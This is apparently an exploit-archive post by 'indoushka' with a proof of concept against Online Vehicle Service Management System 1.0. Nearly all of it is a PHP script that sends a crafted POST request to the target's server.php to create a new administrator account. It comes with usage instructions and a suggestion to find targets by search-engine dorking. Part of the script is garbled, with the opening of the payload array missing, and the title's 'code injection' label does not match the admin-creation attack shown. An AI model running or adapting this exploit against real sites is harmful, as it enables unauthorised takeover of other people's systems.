============================================================================================================================================= | # Title : Online Vehicle Service Management System 1.0 Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) | | # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_vehicle-service-mangement-.zip | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Exploitation allows adding a new admin . [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php target.dz [+] PayLoad : '', 'username' => 'indoushka', 'email' => 'indoushka@04.dz', 'password_1' => '161286@S@m!a', 'password_2' => '!N0vIs', 'qty' => '1' ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$website/server.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo "(+) Admin Add Successfully...\n"; } if ($argc != 2) { echo "(+) Usage: php " . $argv[0] . " \n"; echo "(+) Example: php " . $argv[0] . " http://example.com\n"; exit(-1); } $website = $argv[1]; add_admin_user($website); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================